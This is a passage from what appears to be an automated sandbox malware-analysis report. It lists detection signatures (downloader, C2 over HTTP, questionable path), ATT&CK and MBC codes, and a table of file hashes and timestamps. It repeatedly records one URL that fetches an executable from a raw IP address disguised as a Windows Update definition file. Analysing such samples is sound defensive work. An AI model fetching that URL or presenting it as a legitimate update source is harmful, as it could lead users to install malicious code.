"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
},
{
"url": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
}
],
"new_data": [],
"alert": false,
"families": []
},
{
"name": "network_ip_exe",
"description": "An attempt is made to download an executable from an IP address",
"categories": [
"network",
"downloader"
],
"severity": 5,
"weight": 1,
"confidence": 100,
"references": [],
"data": [
{
"request": "http://14.102.231.204/c/msdownload/update/software/defu/2025/11/am_base_6da640ed28cb4d074e7ba9d26ef1dc42ba3dbd2d.exe?cacheHostOrigin=au.download.windowsupdate.com"
}
],
"new_data": [],
"alert": false,
"families": []
}
]
|
6
|
[
{
"signature": "stealth_network",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002",
"OC0006",
"C0002"
]
},
{
"signature": "network_cnc_http",
"ttps": [
"T1071"
],
"mbcs": [
"OB0004",
"B0033",
"OC0006",
"C0002"
]
},
{
"signature": "network_ip_exe",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002",
"OC0006",
"C0002"
]
},
{
"signature": "network_http",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002"
]
},
{
"signature": "network_questionable_http_path",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002",
"OC0006",
"C0002"
]
},
{
"signature": "static_pe_pdbpath",
"ttps": [
"T1071"
],
"mbcs": [
"OC0006",
"C0002",
"OC0006",
"C0002"
]
}
]
|
Suspicious
|
40784dca35fa06d4c4cb932e101e56ab
|
||||||
e37c838dc5eaa1b302ffbd8721c6a5f52a068e8f78bbec63b…
|
e37c838dc5eaa1b302ffbd8721c6a5f52a068e8f78bbec63b…
|
1
|
1777366068.907416
|
true
|
97fbf2451ebb12a44733cfed3a15c211684aa82caeb56d177…
|
||||||||||||||
9a5ff998dbf0f6923d0b454d89800fb4
|
9a5ff998dbf0f6923d0b454d89800fb4
|
280
|
1776926588.3689904
|
true
|
|||||||||||||||
8589cf7187567a34e487cc53ecfe2285
|
8589cf7187567a34e487cc53ecfe2285
|
288
|
1777198759.8967142
|
true
|
|||||||||||||||
be0930fc1d862072effdd01493361fb5
|
be0930fc1d862072effdd01493361fb5
|
1
|
1777214307.421223
|
true
|
|||||||||||||||
c2bf2a9e6beaff5b5321917475545ef4
|
c2bf2a9e6beaff5b5321917475545ef4
|
2
|
1777221353.0536544
|
true
|
|||||||||||||||
74bb3514f737d1386b7ced741ec1e098
|
74bb3514f737d1386b7ced741ec1e098
|
195
|
1777201224.3801856
|
true
|
|||||||||||||||
6ba13af0263cd61f957f2ce738120c8a419e1eb157e489bc7…
|
6ba13af0263cd61f957f2ce738120c8a419e1eb157e489bc7…
|
2
|
1777365889.5328627
|
true
|
2f963342d9f65f462c3a10407f6533613a385ccee6c1a60de…
|
||||||||||||||
02aa8cabeea2a0120a31adbf0886f821d10953fc6d4d9cd19…
|
02aa8cabeea2a0120a31adbf0886f821d10953fc6d4d9cd19…
|
3
|
1777466809.95765
|
true
|
f1806168ceb8d45c03c860397c0730699b6bb4e9a1a71c6b7…
|
||||||||||||||
2aa5ce3561dc657a157460383c7c9b8db54ac8a6969627009…
|
2aa5ce3561dc657a157460383c7c9b8db54ac8a6969627009…
|
63
|
1779384319.2373335
|
true
|
ce3b318f6ef22967fbd23b9931920285b20426aaf168d5b7e…
|